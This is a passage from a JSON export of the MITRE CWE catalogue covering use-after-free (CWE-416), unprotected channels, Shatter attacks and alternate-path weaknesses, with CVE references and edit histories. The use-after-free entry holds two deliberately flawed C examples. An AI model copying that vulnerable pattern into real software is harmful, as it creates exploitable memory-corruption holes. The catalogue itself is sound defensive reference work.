memory."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"825","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"120","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"123","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":[{"Term":"Dangling pointer"},{"Term":"Use-After-Free"}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Memory","Note":"The use of previously freed memory may corrupt valid data, if the memory area in question has been allocated and used properly elsewhere."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"If chunk consolidation occurs after the use of previously freed data, the process may crash when invalid data is used as chunk information."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"If malicious data is entered before chunk consolidation can take place, it may be possible to take advantage of a write-what-where primitive to execute arbitrary code."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Choose a language that provides automatic memory management."},{"Phase":"Implementation","Description":"When freeing pointers, be sure to set them to NULL once they are freed. However, the utilization of multiple or complex data structures may lower the usefulness of this strategy."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include <stdio.h>#include <unistd.h>#define BUFSIZER1 512#define BUFSIZER2 ((BUFSIZER1/2) - 8)int main(int argc, char **argv) {}","xhtml:br":["","","",""],"xhtml:div":{"#text":"char *buf1R1;char *buf2R1;char *buf2R2;char *buf3R2;buf1R1 = (char *) malloc(BUFSIZER1);buf2R1 = (char *) malloc(BUFSIZER1);free(buf2R1);buf2R2 = (char *) malloc(BUFSIZER2);buf3R2 = (char *) malloc(BUFSIZER2);strncpy(buf2R1, argv[1], BUFSIZER1-1);free(buf1R1);free(buf2R2);free(buf3R2);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","","","",""]}}}},{"Intro_Text":"The following code illustrates a use after free error:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* ptr = (char*)malloc (SIZE);if (err) {}...if (abrt) {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"abrt = 1;free(ptr);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"logError(\\"operation aborted before commit\\", ptr);","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"When an error occurs, the pointer is immediately freed. However, this pointer is later incorrectly used in the logError function."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2010-4168","Description":"Use-after-free triggered by closing a connection while data is still being transmitted.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4168"},{"Reference":"CVE-2010-2941","Description":"Improper allocation for invalid data leads to use-after-free.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2941"},{"Reference":"CVE-2010-2547","Description":"certificate with a large number of Subject Alternate Names not properly handled in realloc, leading to use-after-free","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2547"},{"Reference":"CVE-2010-1772","Description":"Timers are not disabled when a related object is deleted","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1772"},{"Reference":"CVE-2010-1437","Description":"Access to a \\"dead\\" object that is being cleaned up","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1437"},{"Reference":"CVE-2010-1208","Description":"object is deleted even with a non-zero reference count, and later accessed","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1208"},{"Reference":"CVE-2010-0629","Description":"use-after-free involving request containing an invalid version number","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0629"},{"Reference":"CVE-2010-0378","Description":"unload of an object that is currently being accessed by other functionality","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0378"},{"Reference":"CVE-2010-0302","Description":"incorrectly tracking a reference count leads to use-after-free","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0302"},{"Reference":"CVE-2010-0249","Description":"use-after-free related to use of uninitialized memory","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0249"},{"Reference":"CVE-2010-0050","Description":"HTML document with incorrectly-nested tags","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0050"},{"Reference":"CVE-2009-3658","Description":"Use after free in ActiveX object by providing a malformed argument to a method","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3658"},{"Reference":"CVE-2009-3616","Description":"use-after-free by disconnecting during data transfer, or a message containing incorrect data types","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3616"},{"Reference":"CVE-2009-3553","Description":"disconnect during a large data transfer causes incorrect reference count, leading to use-after-free","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3553"},{"Reference":"CVE-2009-2416","Description":"use-after-free found by fuzzing","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2416"},{"Reference":"CVE-2009-1837","Description":"Chain: race condition (CWE-362) from improper handling of a page transition in web client while an applet is loading (CWE-368) leads to use after free (CWE-416)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1837"},{"Reference":"CVE-2009-0749","Description":"realloc generates new buffer and pointer, but previous pointer is still retained, leading to use after free","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0749"},{"Reference":"CVE-2010-3328","Description":"Use-after-free in web browser, probably resultant from not initializing memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3328"},{"Reference":"CVE-2008-5038","Description":"use-after-free when one thread accessed memory that was freed by another thread","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5038"},{"Reference":"CVE-2008-0077","Description":"assignment of malformed values to certain properties triggers use after free","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0077"},{"Reference":"CVE-2006-4434","Description":"mail server does not properly handle a long header.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4434"},{"Reference":"CVE-2010-2753","Description":"chain: integer overflow leads to use-after-free","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2753"},{"Reference":"CVE-2006-4997","Description":"freed pointer dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4997"}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Use After Free"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Using freed memory"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM00-C","Entry_Name":"Allocate and free memory in the same module, at the same level of abstraction"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM01-C","Entry_Name":"Store a new value in pointers immediately after free()"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM30-C","Entry_Name":"Do not access freed memory","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP7","Entry_Name":"Faulty Pointer Use"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 8: C++ Catastrophes." Page 143"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Alternate_Terms, Common_Consequences, Description, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}]}},"419":{"attr":{"@_ID":"419","@_Name":"Unprotected Primary Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses a primary channel for administration or restricted functionality, but it does not properly protect the channel.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Do not expose administrative functionnality on the user UI."},{"Phase":"Architecture and Design","Description":"Protect the administrative/restricted functionality with a strong authentication mechanism."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unprotected Primary Channel"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"383"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"}]}},"420":{"attr":{"@_ID":"420","@_Name":"Unprotected Alternate Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software protects a primary channel, but it does not use the same level of protection for an alternate channel.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"923","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Identify all alternate channels and use the same protection mechanisms that are used for the primary channels."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0567","Description":"DB server assumes that local clients have performed authentication, allowing attacker to directly connect to a process to load libraries and execute commands; a socket interface also exists (another alternate channel), so attack can be remote.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0567"},{"Reference":"CVE-2002-1578","Description":"Product does not restrict access to underlying database, so attacker can bypass restrictions by directly querying the database.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1578"},{"Reference":"CVE-2003-1035","Description":"User can avoid lockouts by using an API instead of the GUI to conduct brute force password guessing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1035"},{"Reference":"CVE-2002-1863","Description":"FTP service can not be disabled even when other access controls would require it.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1863"},{"Reference":"CVE-2002-0066","Description":"Windows named pipe created without authentication/access control, allowing configuration modification.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0066"},{"Reference":"CVE-2004-1461","Description":"Router management interface spawns a separate TCP connection after authentication, allowing hijacking by attacker coming from the same IP address.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1461"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unprotected Alternate Channel"}},"Notes":{"Note":{"#text":"This can be primary to authentication errors, and resultant from unhandled error conditions.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}]}},"421":{"attr":{"@_ID":"421","@_Name":"Race Condition During Access to Alternate Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product opens an alternate channel to communicate with an authorized user, but the channel is accessible to other actors.","Extended_Description":"This creates a race condition that allows an attacker to access the channel before the authorized user does.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"420","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"362","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-0351","Description":"FTP \\"Pizza Thief\\" vulnerability. Attacker can connect to a port that was intended for use by another client.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0351"},{"Reference":"CVE-2003-0230","Description":"Product creates Windows named pipe during authentication that another attacker can hijack by connecting to it.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0230"}]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Alternate Channel Race Condition"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-354"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 13: Race Conditions." Page 205"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Alternate Channel Race Condition","attr":{"@_Date":"2008-04-11"}}}},"422":{"attr":{"@_ID":"422","@_Name":"Unprotected Windows Messaging Channel (\'Shatter\')","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly verify the source of a message in the Windows Messaging System while running at elevated privileges, creating an alternate channel through which an attacker can directly send a message to the product.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"420","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"360","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Always verify and authenticate the source of the message."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0971","Description":"Bypass GUI and access restricted dialog box.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0971"},{"Reference":"CVE-2002-1230","Description":"Gain privileges via Windows message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1230"},{"Reference":"CVE-2003-0350","Description":"A control allows a change to a pointer for a callback function using Windows message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0350"},{"Reference":"CVE-2003-0908","Description":"Product launches Help functionality while running with raised privileges, allowing command execution using Windows message to access \\"open file\\" dialog.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0908"},{"Reference":"CVE-2004-0213","Description":"Attacker uses Shatter attack to bypass GUI-enforced protection for CVE-2003-0908.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0213"},{"Reference":"CVE-2004-0207","Description":"User can call certain API functions to modify certain properties of privileged programs.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0207"}]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unprotected Windows Messaging Channel (\'Shatter\')"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP30","Entry_Name":"Missing endpoint authentication"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-402"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, "Design Review." Page 34"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 12, "Shatter Attacks", Page 694"}}]},"Notes":{"Note":[{"#text":"Overlaps privilege errors and UI errors.","attr":{"@_Type":"Relationship"}},{"attr":{"@_Type":"Research Gap"},"xhtml:p":["Possibly under-reported, probably under-studied. It is suspected that a number of publicized vulnerabilities that involve local privilege escalation on Windows systems may be related to Shatter attacks, but they are not labeled as such.","Alternate channel attacks likely exist in other operating systems and messaging models, e.g. in privileged X Windows applications, but examples are not readily available."]}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Other_Notes, Relationship_Notes, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"423":{"attr":{"@_ID":"423","@_Name":"DEPRECATED: Proxied Trusted Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated because it was a duplicate of CWE-441. All content has been transferred to CWE-441.","Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-05","Modification_Comment":"deprecated this entry as a duplicate of 441"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Applicable_Platforms, Description, Name, Other_Notes, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Name"}],"Previous_Entry_Name":[{"#text":"Proxied Trusted Channel","attr":{"@_Date":"2008-11-24"}},{"#text":"DEPRECATED (Duplicate): Proxied Trusted Channel","attr":{"@_Date":"2021-07-20"}}]}},"424":{"attr":{"@_ID":"424","@_Name":"Improper Protection of Alternate Path","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not sufficiently protect all possible paths that a user can take to access restricted functionality or resources.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"638","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"]}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Deploy different layers of protection to implement security in depth."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Alternate Path Errors"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP35","Entry_Name":"Insecure resource 